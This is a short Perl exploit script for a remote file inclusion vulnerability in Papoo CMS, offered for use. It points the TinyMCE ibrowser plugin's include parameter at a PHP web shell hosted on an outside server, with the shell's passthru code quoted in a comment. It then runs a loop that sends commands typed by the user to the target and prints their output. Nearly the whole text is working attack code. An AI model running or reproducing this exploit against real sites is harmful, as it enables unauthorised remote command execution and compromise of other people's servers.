It makes use of the unset() vulnerability, cms can be found at papoo.de

#!/usr/bin/perl
require LWP::UserAgent;
print "#####PAPOO CMS REMOTE FILE INCLUSION VULNERABILITY \n";
print "#####Exploit & vulnerability by Ironfist\n";
print "##### http://iron.gimyweb.de \n";

print "#####Host?";
$host = <stdin>;
chomp $host;
print "#####Path to Papoo?";
$path = <stdin>;
chomp $path;

#Change this to a path (http://www.site.com/shell.txt) which contains:
# <pre><? passthru($_GET['cmd']); die(); ?>
$shellpath = "http://iron.shmt-pbogdani.org/cmd.txt";




 while(){
print "\nroot\@shell~#";
$cmd = <stdin>;
chomp $cmd;
if($cmd eq "exit"){
exit()
}
$url = "http://".$host.$path."interna/tiny_mce/plugins/ibrowser/ibrowser.php?tinyMCE_imglib_include=".$shellpath."&225672436=1&-1203709508=1&cmd=".$cmd;
my $ua = LWP::UserAgent->new;
$ua->timeout(10);
my $response = $ua->get($url);

 if ($response->is_success) {
 $content = $response->content;
 $content =~ s/<pre>//g;
 print $content;
 }
 else {
    die "connection failed";
 }
 }